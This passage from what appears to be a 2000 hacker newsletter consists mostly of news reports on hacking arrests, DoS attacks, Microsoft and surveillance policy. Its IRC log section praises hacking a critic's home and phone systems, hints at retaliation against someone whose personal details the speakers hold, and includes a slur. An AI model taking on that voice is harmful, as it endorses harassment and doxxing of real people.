      Completely false. Amstream.dll is not one of our DLLs.
      
      If you have any further questions, please don't hesitate to call or
      write.
      
      Thanks,
      Jeremy
      
       ----
      Jeremy J. Newton, VP Sales
      Aureate Media Corporation
      
      @HWA
      
      
     
     

                                 
12.0  German youth charged in DoS attacks
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      German article: http://www.heise.de/newsticker/data/nl-22.02.00-000/
     
      Translated from German by Xistence 
      (HWA Dutch/German translator)
      
      
      NetCologne Saboteur busted

      One young man with the nickname "n0tty" has caused 41 disturbances at NetCologne.
      The 19-year-old guy attacked the communication hardware of the provider NetCologne
      (in the neighbourhood of Kiel) with a Denial-of-Service attack. NetCologne estimates the
      losses at about one million marks (about $600,000).

      First trails pointed to a southern German university. n0tty abused several systems of students with
      a false identity using a "bouncer" and installed a hacker tool called "Redirect" which he used to
      bomb the ISP. n0tty used variants of "UDP-Bombing", which were small data packets sent rapidly
      after each other.

      During a search of the apartment house they found loads of electronic equipment, mainly
      the booty of several failures. At the hearing the surprised one confessed.

     
      NetCologne Saboteur calm 

      A young man with the alias " n0tty " has 41 in Cologne granted disturbances
      opposite the Kriminalkommissariat with NetCologne to have caused. During 
      three days the 19-jaehrige had disturbed beginning communication electronics
      engineers from the proximity of Kiel with an Denial OF service attack the 
      Internet acces of the Providers NetCologne. Netcologne numbers the developed
      damage on approximately a million Mark. 

      First determinations led to the server of a South German university; over 
      this way "n0tty " had abused the acces of several students and under false
      identity a program ("Bouncer ") installed and with the help of the hacker 
      Tools " Redirect " to other Internet user bombarded n0ttys version of the 
      " UDP Bombings ", with which small packets in fast frequency are transmitted
      on a computer, actually applied one <?snip?>
      
      
      Original article (translated from German)...

      NetCologne saboteur caught

      A young man using the pseudonym "n0tty" has admitted to Kriminalkommissariat
      41 in Cologne that he caused disruptions at NetCologne. Over three days, the
      19-year-old trainee communications electronics technician from near Kiel
      disrupted the Internet access of the provider NetCologne with a
      denial-of-service attack. NetCologne puts the resulting damage at around one
      million marks.

      Initial investigations led to the server of a southern German university; via
      this route "n0tty" had misused the accounts of several students, installed a
      program ("Bouncer") under a false identity, and bombarded other Internet users
      with the help of the hacker tool "Redirect". n0tty's variant of "UDP bombing",
      in which small data packets are sent to a machine in rapid succession, was
      actually aimed at a rival hacker colleague.

      During a search of his home the investigators quickly found what they were
      looking for. n0tty's room was filled with electronic equipment, mainly the
      loot from several burglaries. Under questioning, the suspect confessed.
      (Frank Möcke) (nl/c't)
      
      
      @HWA
      
      
      
13.0  HNN: Feb 24th: DigiAlmty, NASA hacker gets nabbed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      DigiAlmty Busted By Feds 


      contributed by McIntyre 
      DigiAlmty (Ikenna Iffih), a 28-year-old Northeastern
      University student, has been charged with electronically
      breaking into the computer systems of NASA and the
      Pentagon. In April of 1999 DigiAlmty was charged with
      illegally gaining access to the systems of the Defense
      Logistics Agency and several commercial systems. Since
      then the case has been expanded and now includes
      intrusions of Northeastern, NASA and the Pentagon.
      DigiAlmty has also been accused of illegally copying
      some files and destroying others. If found guilty,
      DigiAlmty could face up to ten years in prison and
      $250,000 in fines. U.S. Attorney Donald Stern said "All in
      all, the defendant used his home computer to leave a
      trail of cybercrime from coast to coast." (If this guy
      "left a trail from coast to coast" what took them so
      bloody long to drop the hammer?) 

      DigiAlmty (Ikenna Iffih) was a member of the
      Northeastern Chapter of the Association for Computing
      Machinery. 
      
      Mirror of ACM Member Page
      http://www.attrition.org/~mcintyre/digi/www.ccs.neu.edu/groups/acm/members.html
      
      Mirror of DigiAlmty's Home Page at Northeastern
      http://www.attrition.org/~mcintyre/digi/www.ccs.neu.edu/home/ikiffih/
      
      Mirrors of DigiAlmty Defacements 
      http://www.attrition.org/mirror/attrition/digia.html
      

      Agence France-Presse - via Nando Times
      http://www2.nando.net:80/noframes/story/0,2107,500172150-500222086-50105851-0,00.html
      
      Associated Press - via Boston Globe
      http://www.boston.com/dailynews/054/region/Hacker_faces_charges_in_NASA_a:.shtml
      
      Reuters -
      http://www.wired.com/news/technology/0,1282,34539,00.html
      
      
      http://www.boston.com/dailynews/054/region/Hacker_faces_charges_in_NASA_a:.shtml
      
      Hacker faces charges in NASA
      and Interior cases 

      By Martin Finucane, Associated Press, 2/23/2000 20:13 

      BOSTON (AP) Federal authorities charged a college student
      Wednesday with breaking into government and military
      computers, including systems run by NASA, the Defense
      Department and the Interior Department. 

      The U.S. attorney's office accused Ikenna Iffih, 28, a student
      at Northeastern University who lives in Boston, in a
      three-count criminal information, or statement of charges. 

      Iffih's attorney, Charles McGinty, didn't immediately return a
      message seeking comment. If convicted, Iffih faces a
      maximum penalty of 10 years in prison and a fine of $250,000.
      He has an unlisted phone number and he could not be
      reached for comment. 

      Iffih had been charged in August in Seattle, but the case has
      been expanded and moved to Boston. 

      ''All in all, the defendant used his home computer to leave a
      trail of cybercrime from coast to coast,'' U.S. Attorney Donald
      Stern said in a statement. 

      Iffih was charged with gaining access in April 1999 to a
      Defense Logistics Agency computer located in Columbus,
      Ohio, then accessing the computer used by Zebra Marketing
      Online Services, an Internet service provider located in
      Bainbridge Island, Wash. 

      Then in May 1999, Iffih allegedly accessed a NASA computer
      located at the Goddard Space Flight Center in Greenbelt, Md.
      Using the NASA computer as a platform, he gained
      unauthorized access to other computer systems, including the
      Department of Interior Web server. 

      ''The defendant gained illegal access ... either causing
      substantial business loss, defacing a Web page with hacker
      graphics, copying personal information or, in the case of a
      NASA computer, effectively seizing control,'' Stern said. 

      Iffih also allegedly obtained unauthorized access to various
      computers owned and operated by Northeastern University,
      unlawfully copying private information concerning students,
      faculty administrators and alumni. 

      Prosecutors said there was no disruption to the nation's
      defenses and no meddling with satellite control and no
      improper use of private information, but that ZMOS, the
      Internet provider, suffered a ''significant loss of business.'' 

      The Interior Department attack was one of several against
      high-profile government and military Web sites throughout the
      spring and early summer retaliating over FBI raids nationwide
      of several prominent hackers, including one who ultimately
      pleaded guilty to breaking into the White House computers. 

      The FBI raids were ''pretty public, and it raised a lot of
      hackles,'' said B.K. DeLong, a staff member at Attrition.Org, a
      Web site devoted to computer security that maintains an
      archive of vandalized Web pages. ''It caused many people to
      publish banners and deface Web sites in the name of stopping
      the raids.'' 

      The Interior Department Web site, one of those Iffih is charged
      with vandalizing, was hit in May by a hacker known on the
      Internet as ''DigiAlmty,'' who wrote that ''It's our turn to hit them
      where it hurts... We'll keep hitting them 'till they get down on
      their knees and beg.'' 

      In a search of Iffih's home in Boston last fall, authorities said,
      they found a one-page computer printout, containing the user
      name ''DigiAlmty.'' 

      Steve Schroeder, an assistant U.S. attorney in Seattle, said
      there were indications that Iffih and ''DigiAlmty'' might be one
      and the same. Schroeder wouldn't elaborate. 

      Iffih, who remains free, is a ''pretty bright guy, relatively
      sophisticated,'' Schroeder said. 

      Iffih is a student at Northeastern's College of Computer
      Science. 

      Northeastern spokeswoman Janet Hookailo said, ''We have
      been cooperating with authorities since last fall. We'll continue
      to do so.'' 

      Hookailo said university officials also planned to meet with Iffih
      as soon as possible to discuss the allegations. 
      
      @HWA
      
14.0  Discussion on DigiAlmty and general underground chat
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed and edited by Cruciphux
      
      Source: Private IRC channel
      
      Machine names, nicknames and certain info have been deleted from
      this log, but it is for the most part intact and makes good reading
      as additional info to section 13.0.
      
      Session Start: Thu Feb 24 12:47:10 2000
      [12:47] *** Now talking in #???
      [12:47] *** Topic is 'our temp. messageboard at: http://,.
      [12:47] *** Set by slash__ on Thu Feb 24 09:53:24
      #??? created on Thu Feb 24 06:19:31
      <Cruciphux> op me
      [12:47] *** slashh sets mode: +o Cruciphux
      [12:47] *** Cruciphux sets mode: -k trash
      [12:48] *** Joins: <unknown>
      [12:48] *** Cruciphux sets mode: +k thrash
      [12:48] *** Cruciphux sets mode: +o <unknown>
      [12:48] <slashh> k
      [12:48] <slashh> thnx
      [12:50] *** Joins: nf0-man (~w00t@hidden.host.??)
      [12:50] <slashh> sup
      [12:50] <slashh> sup
      [12:50] <slashh> check the msg board
      [12:50] <nf0-man> this is fucking bullshit
      [12:50] <nf0-man> !@#
      [12:50] <nf0-man> fuck
      [12:50] <slashh> what ?
      [12:51] <nf0-man> my friend is got busted
      [12:51] *** slashh sets mode: +o nf0-man
      [12:51] <slashh> what ?!?
      [12:51] <nf0-man> and now they are trying to screw him
      [12:51] <slashh> who !??
      [12:51] <nf0-man> DigiAlmty
      [12:51] <nf0-man> 10 years in prison if he's found guilty
      [12:51] <slashh> ohh
      [12:51] <slashh> I read that
      [12:51] <slashh> no shit 1???????
      [12:51] <nf0-man> yah...
      [12:51] <nf0-man> he was a good friend of mine
      [12:51] <slashh> shit
      [12:51] <nf0-man> and he's not the type to delete files or be malacious
      [12:51] <slashh> yeah ?!
      [12:51] <slashh> I saw his defacments
      [12:52] <nf0-man> he always installed tcpwrappers and secured shit and 
                        never  messed with anything except defacements      
      [12:52] <nf0-man> index.htm
      [12:52] <slashh> though luch
      [12:52] <slashh> luck
      [12:52] <nf0-man> thats bullshit
      [12:52] <nf0-man> is what it is
      [12:52] <nf0-man> he doesnt deserve this
      [12:52] <nf0-man> zyklon broke into the damn whitehouse and he only got 
                        15 months !$
      [12:53] <slashh> ...
      [12:53] <slashh> dont't know what to say......
      [12:53] <slashh> it sucks      
      
      <SNIP> 
      
      [12:54] <nf0-man> and another thing...
      [12:54] <nf0-man> a long time ago last year
      [12:54] <slashh> yeah.. ?
      [12:54] <nf0-man> DigiAlmty showed me an e-mail
      [12:54] *** Joins: ethO (~unknown@momma.luvs.yu)
      [12:54] <nf0-man> that mosthated sent to all the admins of the sites he 
                        broke into
      [12:54] <slashh> from whom ?
      [12:54] <ethO> hey
      [12:54] <ethO> :)
      [12:54] <nf0-man> mosthated quoted in that interview someone put in HWA...
      [12:54] <nf0-man> "I want to devote my time catching these individuals that
                        deface websites for fun"
      [12:54] <slashh> cruciphux did the interview
      [12:55] <nf0-man> theres a statement rite there
      [12:55] <slashh> who said that !?!!
      [12:55] <nf0-man> mosthated said something exactly like that
      [12:55] <nf0-man> in the interview in HWA
      [12:55] <slashh> no shit ?!
      [12:55] <nf0-man> you never trust anyone who's been raided
      [12:55] <nf0-man> because they all change
      [12:55] <nf0-man> and it was publicly told
      [12:56] <slashh> damn....
      [12:56] <nf0-man> that mosthated was working with the government for months 
      [12:56] <ethO> slashh. did you test pirchslap.c?
      [12:56] <nf0-man> before any of the raids
      [12:56] <slashh> no
      [12:56] <slashh> eth0
      [12:56] <nf0-man> this was on 20/20      
      [12:56] <ethO> ..
      [12:56] <nf0-man> a while ago
      [12:56] <slashh> lamagra's gonna sk00l U on coding in C
      [12:56] <nf0-man> the only group thats ever defaced
      [12:56] <nf0-man> that I have any respect for
      [12:56] <nf0-man> is H4G1S
      [12:56] <slashh> w0rd
      [12:57] <ethO> slashh. huh?
      [12:57] <nf0-man> tr0ut is going through bullshit to
      [12:57] <nf0-man> he's a fellow canadian as well
      [12:57] <nf0-man> 6 months + 7,000 dollar fine for defacing nasa.gov
      [12:57] <slashh> didn;t know that
      [12:57] <nf0-man> he's a member of h4g1s
      [12:57] <nf0-man> or was anyways
      [12:58] <nf0-man> it's usually not wise to mess with people like them
      [12:58] <nf0-man> c0mega of attrition did
      [12:58] <nf0-man> and they fucked his life up
      [12:58] <slashh> yea h?!?
      [12:58] <slashh> how ?
      [12:58] <nf0-man> made him loose his wife and all that
      [12:58] <nf0-man> hacked into all his home systems and his wifes work
      [12:58] <slashh> no shit?!?!!
      [12:58] <nf0-man> and his
      [12:58] <slashh> how did they do that ?!
      [12:58] <nf0-man> disconnected his phone lines
      [12:58] <slashh> damn.,.....
      [12:58] <ethO> defacing will only get you into trouble..
      [12:58] <nf0-man> and his business phones
      [12:58] <slashh> these guys are really elite
      [12:59] <nf0-man> H4G1S is the best so far 
      [12:59] <nf0-man> besides the originals like LOD and masters of deception
      [12:59] <slashh> damn...
      [12:59] <nf0-man> coolio...
      [12:59] <nf0-man> the person supposedly
      [12:59] <slashh> yeah ?
      [12:59] <nf0-man> responsible for the DoS attacks
      [12:59] <slashh> what about him ?
      [12:59] <nf0-man> he's going to get a surprise
      [13:00] *** ethO is now known as misteri0
      [13:00] <nf0-man> I have his infos
      [13:00] <slashh> no shit !??????????/
      [13:00] <slashh> where did U get it ?
      [13:00] <nf0-man> someone gave them to me
      [13:00] <slashh> U gonna get him raided ?
      [13:00] <nf0-man> no
      [13:00] <misteri0> slashh. are there any new members?
      [13:00] <nf0-man> that would be like narcing on someone
      [13:00] <nf0-man> fuck that
      [13:00] <nf0-man> im just saying
      [13:00] <nf0-man> he should be careful
      [13:00] <slashh> yah
      [13:00] <nf0-man> because alot of people have his info
      [13:01] <nf0-man> and alot of people don't like him
      [13:01] <slashh> he's gonna get busted for shure
      [13:01] <nf0-man> the f3ds have his info
      [13:01] <nf0-man> they got it from RSA
      [13:01] <misteri0> bah, slassh, are tehre any new members!?
      [13:01] <slashh> w00w
      [13:02] <slashh> he's going top get fucked
      [13:02] <nf0-man> all the people I know are getting screwed
      [13:02] <slashh> that's why
      [13:02] <slashh> we won't be involved in any defacments
      [13:03] <nf0-man> i got tired of that shit
      [13:03] <nf0-man> to many new kids and there little msadc
      [13:03] <slashh> :)
      [13:03] <slashh> say..
      [13:03] <nf0-man> slipy and egodeath of hv2k got busted to
      [13:03] <slashh> how do U know all that shit about h4g1s
      [13:03] <slashh> yeah ?
      [13:03] <slashh> I dindn;t know that
      [13:03] <nf0-man> I know alot about the whole defacing thing
      [13:03] <nf0-man> and shit
      [13:03] <misteri0> damn, you guys are speaking anoher lang..
      [13:04] <nf0-man> ive been around since 97 in it
      [13:04] <slashh> I started 98
      [13:04] <misteri0> nf0-man. is gh still around?
      [13:04] <nf0-man> oh and ADM are leet, even thpugh they defaced
      [13:04] <misteri0> globall hell
      [13:05] <slashh> yeah
      [13:05] <slashh> they are still around
      [13:05] <nf0-man> hmmm
      [13:05] <nf0-man> slash...
      
      <SNIP>  (personal dissing)    
      
      [13:07] <nf0-man> DigiAlmty better not be found guilty though
      [13:07] <misteri0> thx
      [13:07] <slashh> np
      [13:07] <slashh> he is in deep shit
      [13:07] <nf0-man> if he is
      [13:08] <nf0-man> yah
      [13:08] <nf0-man> gH people broke into the boxes that digia got into
      [13:08] <nf0-man> they hacked his BNC's and shit
      [13:08] <slashh> yeah
      [13:08] <slashh> I read his defacments
      [13:08] <nf0-man> up to no good
      [13:09] <slashh> wargames and shit......
      [13:09] <nf0-man> its also amusing that....
      [13:09] <nf0-man> ????????? and ???????? get shourouts in HWA
      
      <NOTE: We try and remain unbiased towards people unless blatantly
      <      attacked ourselves, we give greets to people that have helped
      <      us in the past or even just hang in the channel and have fun 
      <      chats with ...we don't take sides in 'channel wars' etc, when
      <      avoidable. - ed
      
      [13:09] <nf0-man> shoutouts rather
      [13:09] <slashh> hrmm....
      [13:09] <slashh> cruci ?!
      [13:09] <nf0-man> I'm going to write something for HNN
      [13:09] <nf0-man> about all this bullshit
      [13:10] <slashh> aaight
      [13:10] <slashh> w0rd
      [13:10] <misteri0> wargames, as in i'm-gonna-take-over-your-channel-and
                         -open-up-a-cable-and-smurf-all-your-bots?
      [13:10] <nf0-man> about all these stupid reporters that turn faggots like
                        ???????? and these DoS kids into media whores
      [13:10] <nf0-man> I cant stand it... I believe solomly in the term 
                        "underground"
      [13:10] <nf0-man> attention leads to being wanted and your damn rite if
                        'they' want to find you they will...
      [13:11] <nf0-man> people don't seem to understand that, the government can
                        do whatever they want
      [13:11] <slashh> no messing with the FBI
      [13:11] <nf0-man> no messing with the rcmp
      [13:11] <slashh> rcmp ?
      [13:11] <nf0-man> royal canadian mounted police
      <Cruciphux> Canadian version of the 'FBI'
      [13:12] <slashh> shit...
      [13:12] <nf0-man> yah
      [13:12] <nf0-man> i was just about to say that
      [13:12] <nf0-man> cruciphux is awake?
      [13:12] <slashh> yeah
      <Cruciphux> yeah :)
      <Cruciphux> hi
      [13:12] <nf0-man> word, sup?
      [13:12] <slashh> I need a smoke after this
      [13:12] <slashh> :)
      [13:13] <nf0-man> HWA > *
      [13:13] <nf0-man> besides BoW
      [13:13] <slashh> shit I can handle in one day
      [13:13] <nf0-man> no offense
      <Cruciphux> BoW haha
      <Cruciphux> they rock
      [13:13] <slashh> BoW ?!
      [13:13] <nf0-man> yep
      [13:13] <slashh> whats that ?
      [13:13] <nf0-man> a fellow canadian has been screwed by the us/ca government
      [13:13] <nf0-man> tr0ut
      [13:13] <slashh> :(
      [13:14] <nf0-man> i live pretty close to him too
      
      <SNIP>
      
      End of relevant convo.
      
      <session ends>
      
      
      @HWA
      

15.0  Microsoft cancels tournament after cybercrime.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Contributed by Xistence
      
      17 February 2000
      
      http://www.webwereld.nl/nieuws/dysta/3790.phtml (DUTCH)
      
      Microsoft cancels tournament after cybercrime.
      
      The Dutch introduction of Windows 2000 was to go with an
      Internet tournament; that was the idea of Microsoft. Participants could,
      via the Windows 2000 Challenge, do a search and puzzle tour on the net. The
      project was cancelled a few hours after the start on Wednesday.
      
      Microsoft was a victim of a Denial-of-Service attack (DoS). Last week
      lots of American sites were attacked the same way. They started
      attacking the Microsoft servers on Wednesday morning. MS tried to
      transfer the game to other servers, but it didn't help.
      
      The servers could handle 100,000 visitors at one time, but couldn't
      handle the fake requests of the Internet criminals.
      That's why the server wasn't reachable by the serious visitors. As
      usual with DoS attacks, the servers were not broken into.
      
      Microsoft decided to cancel the Challenge, because the game was tied
      to the moment of the worldwide launch of Windows 2000.
      All participants have received information about it. The prize money of
      20,000 Euro will be given to the "Young Minds in Motion" foundation,
      which was set up by Bill Gates.
      
      Microsoft will try to catch the criminals. Michiel Gosens of Microsoft
      says: "We are finding out how to catch the criminals.
      We are very disappointed about this action."
      
      @HWA
      
      
16.0  Microsoft on 'Open Windows': Baloney!
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by SugarKing
       
      Company denies report quoting Gates as ready to open source code to settle
      antitrust suit.
      
      Source: ZDNet
      url: http://www.zdnet.com/zdnn/stories/news/0,4586,2440749,00.html?chkpt=zdhpnews01
       
      
      When Bill Gates talks, reporters scurry.
      
      Do they ever.
      
      Microsoft's ever-in-the-news chairman was again the object of attention 
      Thursday afternoon.

      Not because of the introduction earlier in the day of Windows 2000, the 
      anticipated upgrade to the company's powerful network operating system.

      Rather, Gates was quoted as saying that Microsoft (Nasdaq: MSFT) was ready 
      to compromise on a key issue and settle its antitrust lawsuit with the 
      government.

      In an interview with Bloomberg Television on Thursday, Gates was quoted as 
      saying the software giant would be willing to open to competitors the 
      source code to its Windows operating system, its flagship product, to 
      settle the lawsuit brought by the U.S. Justice Department. (See: 
      Settlement? Microsoft may open its code)

      Or was he?

      'Bill did not comment ...'

      "Bill did not comment in any way on the mediation process or any 
      settlement proposals," said company spokesman Jim Cullinan.

      Meanwhile, the news wires crackled as observers attempted to deconstruct 
      his statement. The only point that was clear was that nobody outside of 
      Microsoft's chairman really knew whether it signaled a break in the legal 
      logjam.

      "Just because he says he's interested doesn't indicate he's ready to make 
      a deal," said Stephen Houck, a New York antitrust lawyer who was the lead 
      counsel for the 19 states during the course of the Microsoft antitrust 
      trial. "Making the source code available has a lot of theoretical appeal. 
      But they would have to do a lot of work to make sure it's a viable package 
      that would interest potential competitors."

      Last May, company President Steve Ballmer (who's now also CEO) said 
      Microsoft had not ruled out making at least part of the Windows source 
      code available for the public domain. At the time, Microsoft was under 
      pressure to react to the growing momentum of Linux.

      But there's been no movement on that count since then.

      As a rule, company executives have strenuously resisted suggestions that 
      Microsoft should put what are essentially its crown jewels into the 
      public domain.

      Final arguments coming in D.C.

      The latest flurry occurred less than a week before Microsoft and the 
      government are set to present final arguments before U.S. District Judge 
      Thomas Penfield Jackson in Washington, D.C. The two sides have been 
      meeting separately with a court-appointed mediator, U.S. Circuit Judge 
      Richard Posner.

      Neither Microsoft nor the government has commented on the substance of the
      talks. But sources familiar with the deliberations say the negotiations have
      gone slowly and that Posner has remained unable to bridge the gap between 
      the sides.
      
      @HWA
      
      
      
17.0  Defending privacy and law enforcement
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by SugarKing
      
      Source: CS Monitor
      url: http://www.csmonitor.com/durable/2000/02/17/p13s1.htm
      
      
      It took less than 24 hours for the FBI to track an e-mail message in 
      December from the inbox of a Columbine High School student in Colorado to 
      its source on the computer of a Florida teenager.

      Just one search warrant allowed law enforcement to lift the thin veil of 
      anonymity - in this case, the name Soup81 - from the e-mail address that 
      shielded Michael Ian Campbell. Mr. Campbell's message to 16-year-old Erin 
      Walter, threatening to finish the deadly rampage begun by two high school 
      seniors at Columbine last April, shut down the high school for two days. 
      Campbell has said he was only joking.

      But the ability of law enforcement to reach behind pseudonyms and unmask 
      computer criminals is no laughing matter. The Internet has become a 
      welcoming host to a vast array of crimes, from terrorism to stock fraud to 
      stalking, luring perpetrators with the apparent ease of online anonymity.

      Law enforcement is struggling to catch up to the latest computer 
      technology, scrambling to develop the knowledge and capability to crack 
      even the most sophisticated cybercrimes. Meanwhile, their fancy detective 
      work is making the defenders of civil liberties nervous, as they envision 
      such snooping technology being used to monitor people's private lives.

      For many, the attraction of the Internet is the ability to speak one's 
      mind with anonymity. E-mail, chat rooms, message boards, and listservs 
      allow users to spread their messages without fear of repercussion. But 
      Martha Stansell-Gamm, chief of the Computer Crimes and Intellectual 
      Property Section at the Department of Justice, says the government is 
      seeing an enormous increase in computer crimes, as Internet use roughly 
      doubles each year. "It can be very difficult to attribute particular 
      conduct to a particular person," she says.

      Local law enforcement is similarly stymied. "The technology the bad guys 
      have seems to be in advance of what the police have," says Bob Wallace, 
      spokesman for the National Association of Chiefs of Police.

      Barbera Moser, an FBI agent in Miami, says federal agents are desperately 
      trying to catch up. "We're not used to dealing with an electronic medium. 
      We have too many officers out there who didn't grow up with this stuff."

      There are all sorts of ways for computer criminals to hide their tracks, 
      from spoof headers to anonymous remailers to multiple layers of 
      encryption. But most messages have some sort of return address, which is 
      how computers communicate.

      Usually, law enforcement can trace back along the chain of addresses to an 
      Internet service provider that, if served with a warrant, will turn over 
      information that identifies the source of the message. "If there's any way 
      for us, we're going to find it," says Ms. Stansell-Gamm, who adds that the 
      Justice Department is engaged in a massive effort to educate prosecutors 
      nationwide about the latest computer technology.

      But defenders of privacy and civil liberties fear that increasingly 
      sophisticated means for tracing messages may mean the end of anonymity on 
      the Internet. "I think this is going to be one of the big battles that's 
      fought over the next years," says David Sobel, general counsel for the 
      Electronic Privacy Information Center, a nonprofit research group.

      At the heart of the battle is the First Amendment, which the Supreme Court 
      has said protects anonymous speech. In 1995, the Supreme Court in McIntyre 
      v. Ohio Elections Commission struck down an Ohio law that required 
      identification of the authors of anonymous leaflets, noting that anonymous 
      messages "have played an important role in the progress of mankind."

      Both sides in the debate acknowledge that there is a palpable tension 
      between developing the technological means to trace Internet lawbreakers 
      and maintaining the right of legitimate, anonymous speech.

      Says Saunders: "I don't want a Big Brother state, but I also don't want to 
      see innocent victims getting killed."
      
      
      @HWA
      
      
18.0  Cyber Safe or Gov't Surveillance? 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by SugarKing
      
      Source: Wired
      url: http://www.wired.com/news/politics/0,1283,34027,00.html
      
      
      WASHINGTON -- A government plan to monitor networks for intrusions goes 
      too far and will lead to increased surveillance and privacy violations, a 
      civil liberties group told a Senate panel on Tuesday. 

      The Electronic Privacy Information Center said a memo it obtained last 
      week shows that the Clinton administration's FIDNET proposal for 
      "information systems protection" will result in unwarranted spying on 
      Americans. 

      Documents the group received through a Freedom of Information Act request 
      indicate the administration is considering broad access to credit card and 
      phone records of private citizens and monitoring of government workers' 
      computers, EPIC director Marc Rotenberg told the Senate judiciary 
      subcommittee on technology and terrorism. 

      "The FIDNET proposal, as currently conceived, must simply be withdrawn. It 
      is impermissible in the United States to give a federal agency such 
      extensive surveillance authority," Rotenberg told the panel chaired by Jon 
      Kyl, an Arizona Republican. 

      The privacy problems of FIDNET and similar government efforts are 
      exaggerated, said Critical Infrastructure Assurance Office director John 
      Tritak. 

      "FIDNET is intended to protect information on critical, civilian 
      government computer systems, including that provided by private citizens. 
      It will not monitor or be wired into private sector computers," Tritak 
      said. "All aspects of the FIDNET will be fully consistent with all laws 
      protecting the civil liberties and privacy rights of Americans." 

      Tritak showed up to discuss the so-called "National Plan for Information 
      Systems Protection, Version 1.0," which the government released in 
      January. It calls for additional government spending to thwart a "highly 
      organized, systematic cyberattack by hostile powers or terrorist 
      organizations." 

      The 199-page plan includes a chapter titled "protecting privacy and civil 
      liberties." The chapter calls for an annual "public-private colloquium" 
      and review of privacy practices by "appropriate authorities." 

      But it does not say the CIAO will reveal even summaries of its activities 
      -- the sort of regular review required of federal prosecutors who ask for 
      wiretaps of phone lines. "Nowhere does the Plan answer such questions as 
      what formal reporting requirements will be established, what independent 
      review will be conducted, and what mechanisms for public accountability 
      and government oversight will be put in place," EPIC's Rotenberg said. 

      Also testifying was Frank Cilluffo, deputy director of the organized crime 
      project at the Center for Strategic & International Studies. CSIS has 
      close ties to the military, and last month appointed soon-to-be former 
      deputy secretary of defense John Hamre as its president and CEO. 

      Cilluffo sided with CIAO: "Throughout history, the first obligation of the 
      state has been to protect its citizens. Today is no exception." 

      "Overall, I think the [CIAO] plan does an excellent job identifying gaps 
      and shortfalls within the federal government, and charting an initial 
      course of action to address them. My major concern is that it does not do 
      enough," Cilluffo said. 

      FIDNET, the part of the overall CIAO plan aimed at detecting intrusions 
      into federal computers, came under fire last summer. Civil liberties 
      groups and some legislators warned it could be too intrusive and could 
      monitor the private-sector Internet. 

      The Justice Department didn't help matters by replying last September in a 
      letter that said FIDNET would not -- at least, as currently "envisioned." 

      During the hearing Tuesday, CIAO's Tritak echoed what other law 
      enforcement representatives have said: "One person with a computer, a 
      modem, and a telephone line anywhere in the world can potentially break 
      into sensitive government files, shut down an airport's air traffic 
      control system, or disrupt 911 services for an entire community." 

      A top FBI official said the same thing in January, warning that electric 
      power is vulnerable to miscreant hackers. But a person close to the North 
      American Electric Reliability Council -- a trade association of electric 
      power generating companies -- told Wired News that he wasn't aware of any 
      power control computers hooked up to telephone lines or the Internet. 
      
      @HWA
      
      
19.0  First Win2000 Fix Out 
      ~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by SugarKing
      
      Source: Wired
      url: http://www.wired.com/news/technology/0,1282,34452,00.html

      Just one day after trumpeting Windows 2000 as the solution for business, 
      Microsoft issued its first update to the OS that adds compatibility with 
      45 popular games. 

      The compatibility update also includes one hardware fix, adding support 
      for Iomega Zip drives connected to the parallel port. 

      Company officials said the patch will help Windows 2000 work better with 
      applications. Microsoft's own FrontPage 98, a Web page building 
      application, is on the list of programs that are helped by the patch. But 
      the bulk of the list is mostly games, such as Creature 3, F22 Lightning 
      III, and Mageslayer. 

      A Microsoft spokesman said the company was focused on Windows 2000 
      compatibility with top business applications up until now. But with two 
      months of extensive beta testing behind the product, Microsoft was able to 
      expand testing to consumer titles. 

      That is important, since even though Windows 2000 targets business users, 
      Microsoft officials said they expect it will also make its way into the 
      hands of home users. 

      One analyst said it's not surprising. 

      "It's very difficult to have an OS that won't exist in both places if it's 
      on a PC, because the equipment exists in both the home and workplace," 
      said Rob Enderle, senior analyst with the Giga Information Group. "Some 
      people who use it at work also want to use the same OS at home. This is 
      not an uncommon situation." 

      Microsoft gave no schedule for future compatibility releases. Windows 2000 
      still has a number of acknowledged application incompatibilities, 
      including AOL 4.0 and early versions of Microsoft's own MSN portal. 

      @HWA
      
      
20.0  Boy, 14, charged with hacking
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by SugarKing
      
      Source: St. Petersburg Times
      url: http://www.stpetersburgtimes.com/News/021800/Citrus/Boy__14__charged_with.shtml
      
      
      Authorities say he got into a server at Crystal River High School that 
      contained teacher files, including students' grades. But they say he 
      didn't change anything or damage the school's system. 

      CRYSTAL RIVER -- Jacy Kyle Johnson sometimes bragged to his friends that 
      he could crack the school computer system and change his grades. 

      He is accused of doing a little more than boast. 

      Johnson, 14, is charged with hacking his way into teacher grading files 
      almost two weeks ago from a computer in the Crystal River High School 
      library. School officials say they don't think he changed his or anyone 
      else's grade, but he may have penetrated at least two protective software 
      layers in the computer called firewalls, which are designed to prevent 
      such intrusions. 

      "The first thing we did is call in our district technical support people," 
      Crystal River principal Craig Marlett said Thursday. "They're pretty 
      confident he didn't change his grades. He was on his way, but didn't get 
      quite into it." 

      Johnson was in juvenile court Thursday, where he faced a charge of 
      accessing a computer network without authorization of the network owner -- 
      computer hacking -- stemming from his Feb. 7 arrest. He also faced three 
      other charges related to alleged assaults on his mother and was ordered 
      held at a juvenile detention center in Ocala for up to 15 days while 
      officials determine what to do with him. 

      Keith Schenck, staff attorney for the Circuit Court judges in Citrus 
      County, said it is rare that someone has been charged with such an offense 
      in this county. 

      "This may be the first one," he said. 

      However, the law under which Johnson is charged actually was created in 
      1978, he said. 

      The teen was found out after another student witnessed Johnson using a 
      library computer to tap into school records and told a teacher. The 
      teacher saw Johnson walk away in a hurry from the computer and checked it 
      out, said Jeffery Smith, the assistant state attorney who handles juvenile 
      offenders. 

      A school resource officer investigated the incident. He learned from 
      school staff that Johnson had bragged about breaking into the school 
      computer. Staff members also told him students were talking about paying 
      Johnson to change their grades. 

      From the library computer, Johnson gained access to the computer server 
